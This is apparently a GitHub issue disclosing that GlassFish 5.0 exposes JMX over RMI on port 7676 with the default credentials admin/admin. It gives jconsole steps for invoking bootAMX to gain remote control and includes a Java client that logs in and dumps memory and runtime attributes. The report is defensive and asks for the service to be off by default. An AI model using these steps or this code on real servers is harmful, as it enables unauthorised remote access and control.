Closed
Description
Glassfish jmx_rmi Remote monitoring and control problem
Environment Details
- GlassFish Version (and build number): 5.0
- JDK version: 1.8
- OS: win7
Problem Description
- Open demo by default. GlassFish will open the 7676 port by default. And can be remotely accessed.
- Discover JMX URL:
service:jmx:rmi://M0ker/jndi/rmi://172.16.125.128:8686/172.16.125.128/7676/jmxrmi - JMX is a weak password. admin/admin
- Meanwhile, more information is missing from jconsole.exe.
- Then click the corresponding function. amx-support --> operation --> bootAMX
- Come out of a amx directory.
- In amx, may Remotely operated functions such as deleting demo, stopping, closing, creating, and database operation.
- And there's a lot of server information here.
- Here is a simple java sample for remote access to information through Glassfish JMX.
`package jxm_rmi;
import java.lang.management.ManagementFactory;
import java.lang.management.MemoryMXBean;
import java.util.Hashtable;
import java.util.Iterator;
import javax.management.Attribute;
import javax.management.JMX;
import javax.management.MBeanAttributeInfo;
import javax.management.MBeanInfo;
import javax.management.MBeanServerConnection;
import javax.management.ObjectInstance;
import javax.management.ObjectName;
import javax.management.remote.JMXConnector;
import javax.management.remote.JMXConnectorFactory;
import javax.management.remote.JMXServiceURL;
public class JMX_RMI {
public static void main(String[] args) throws Exception {
String user = "admin";
String pass = "admin";
JMXServiceURL url = new JMXServiceURL("service:jmx:rmi://M0ker/jndi/rmi://172.16.125.128:8686/172.16.125.128/7676/jmxrmi");
Hashtable<String, String[]> env = new Hashtable<String, String[]>();
String[] credentials = new String[] {user,pass};
env.put(JMXConnector.CREDENTIALS, credentials);
JMXConnector jmxc = JMXConnectorFactory.connect(url,env);
MBeanServerConnection mbsc = jmxc.getMBeanServerConnection();
MemoryMXBean mbean = ManagementFactory.newPlatformMXBeanProxy(mbsc, ManagementFactory.MEMORY_MXBEAN_NAME, MemoryMXBean.class);
System.out.println(mbean.getHeapMemoryUsage());
System.out.println(mbean.getNonHeapMemoryUsage());
ObjectName objectName = new ObjectName("java.lang:type=Runtime");
MBeanInfo mBeanInfo = mbsc.getMBeanInfo(objectName);
MBeanAttributeInfo[] mBeanAttributes = mBeanInfo.getAttributes();
System.out.println("\n");
System.out.println("MBeanInfos : ");
for (MBeanAttributeInfo mBeanAttribute : mBeanAttributes) {
System.out.println("\t"
+ mBeanAttribute.getName()
+ "\t"
+ mBeanAttribute.getType()
+ "\tvalue = >"
+ mbsc.getAttribute(objectName,
mBeanAttribute.getName()));
}
System.out.println("\n");
}
}`
Impact of Issue
- This is originally a remote monitoring performance JMX. I don't want it to be a loophole for others to invade me. I hope you can turn it off by default. He does have a certain degree of harm. It can also be remotely manipulated. Thank you very much. Sorry to disturb you !
Metadata
Metadata
Assignees
Labels
No labels